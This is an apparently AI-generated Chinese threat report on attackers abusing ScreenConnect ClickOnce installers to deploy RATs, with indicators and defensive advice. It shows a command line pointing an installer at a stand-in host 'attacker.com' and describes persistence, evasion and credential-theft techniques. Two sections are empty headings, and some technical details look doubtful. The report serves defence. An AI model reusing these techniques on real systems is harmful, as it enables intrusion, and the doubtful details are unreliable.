ScreenConnect 安装程序武器化攻击深度分析报告【红客联盟 AI 分析】

一、威胁全景：RMM 工具滥用的技术升级

（一）攻击定位

• 攻击类型：可信工具劫持 + 多阶段 RAT 投递，利用 ConnectWise ScreenConnect 的 ClickOnce 安装程序，针对美国企业实施定向渗透（主文档 / 摘要 1）；
• 威胁行为者：具备 RMM 工具深度定制能力的团伙（关联 AsyncRAT 生态），自 2025 年 3 月活跃，单月攻击频次增长 170%（摘要 1/5）；
• 技术标签：ClickOnce 无配置安装、内存载荷注入、双重 RAT 冗余部署、AMSI 绕过。

（二）核心数据

二、技术解析：五阶段攻击链（主文档 + 摘要 1/2/6）

（一）第一阶段：社会工程学伪装（钓鱼入口）

• 诱饵设计：文件名模仿官方文档（如社保声明、协议支持），图标伪装为 PDF/Word，诱导用户执行（主文档 / 摘要 2）；
• 传播渠道：SEO 投毒（伪装 AI 网站 gptgrok.ai）、恶意广告（摘要 2），利用 “AI 生成内容” 热点提升可信度。

（二）第二阶段：ClickOnce 无文件安装（规避静态检测）

• 技术特性：
  • 无嵌入式配置：传统 ScreenConnect MSI 含硬编码 C2，本次使用 ClickOnce 动态拉取（h=morco.rovider.net&p=8041），规避静态分析（摘要 1/3）；
  • 合法签名滥用：篡改微软 Authenticode 证书，将恶意参数嵌入数字签名（摘要 2），绕过 Defender 警告。
• 执行流程：
  powershell

  ClickOnce.exe /parameters "e=Support&y=Guest&h=attacker.com"  # 内存加载，无磁盘落地
  

（三）第三阶段：自动化双 RAT 部署（冗余控制）

• 批处理BypaasaUpdate.bat下载guilloton.fr/x.zip，内含加密组件（摘要 1）；
• 调用mshta.exe启动无文件执行，通过chrome.exe进程镂空注入载荷（摘要 2）。

（四）第四阶段：持久化与反检测（长期控制）

• 驻留机制：
  • 计划任务：每分钟执行C:\ProgramData\ali.zip解压脚本，确保存活（主文档）；
  • 注册表 Run 键：创建 “Windows Security” 项，指向backup.bat（摘要 2）。
• 反检测策略：
  • 互斥体检查（Global\SC_Mutex）避免重复运行；
  • 检测沙箱（VBoxService.exe）触发延迟执行（300 秒），规避自动化分析（摘要 6）。

（五）第五阶段：数据窃取与横向渗透

• 数据收集：
  • 浏览器密码（Chrome/Edge）、加密货币钱包（MetaMask）、剪贴板内容（防地址劫持）；
  • 系统信息（IP、域、安装程序列表），通过Microsoft.XMLHTTP回传 C2（摘要 1）。
• 横向移动：
  • 利用 ScreenConnect 远程会话，向域内其他设备推送X-META Firebase_crypted.bat，重复感染（摘要 2）。

三、技术升级：对比传统 ScreenConnect 攻击

四、防御建议：全链路阻断策略（整合摘要 1/2/5 最佳实践）

（一）紧急响应（72 小时）

1. 终端排查：
   • 检查%ProgramData%目录，删除ali.zip及1.txt/pe.txt，终止charmap.exe异常进程（命令行含NBMiner）；
   • 清理计划任务：删除 “Edge” 相关每分钟执行任务，重置注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run。
2. 网络阻断：
   • 封禁 C2 域名（morco.rovider.net、guilloton.fr）及 IP（185.196.9.158），拦截/x.zip下载请求；
   • 部署 WAF 规则，检测ScreenConnect.ClientSetup.msi异常参数（如含e=Support&y=Guest）。

（二）长效防护（30 天）

1. RMM 工具管控：
   • 禁用 ScreenConnect 自动更新，通过组策略限制BypaasaUpdate.bat执行（参考微软 KB5005413）；
   • 启用 ScreenConnect 审计日志，监控 “自动化脚本执行”“异常 C2 连接”（如非官方 IP 8041 端口）。
2. 行为分析：
   • 部署 EDR（如 CrowdStrike），创建 “ClickOnce 动态加载” 规则（内存写入量 > 500KB，且非微软签名）；
   • 监控 PowerShell 异常脚本：检测IEX、Invoke-Expression调用 Base64/XOR 解码，拦截Skype.ps1类文件。
3. 用户教育：
   • 模拟 “社保文档” 钓鱼测试，强调 “官方程序仅从官网下载”，禁止运行后缀含.Client.exe的文件；
   • 加密货币用户专项：禁用剪贴板自动填充，手动输入钱包地址（防御地址劫持，摘要 2）。
4. 代码签名校验：
   • 启用 Windows Defender “代码完整性”，拒绝未签名的 ScreenConnect 组件加载（摘要 2）；
   • 定期审计数字证书，撤销异常签名（如含 “Support&Guest” 参数的证书）。

五、行业影响与趋势预警

（一）典型案例（2025 年 8 月，摘要 2）

• 感染路径：某科技公司员工下载伪装 AI 视频的 ScreenConnect.msi，触发双 RAT 部署；
• 损失后果：攻击者窃取 300+AWS 管理密钥，删除生产环境数据库，导致服务中断 48 小时。

（二）威胁趋势

1. RMM 工具滥用常态化：除 ScreenConnect 外，AnyDesk、TeamViewer 等工具被武器化（摘要 6），企业需建立 “远程工具白名单”；
2. AI 热点劫持：攻击诱饵从 “社保文档” 转向 “AI 生成内容”，利用 “grokai”“soraai” 等仿冒域名（摘要 2）；
3. 无文件技术深化：载荷全部内存驻留，结合进程镂空（如msedge.exe），传统文件检测完全失效（摘要 2）。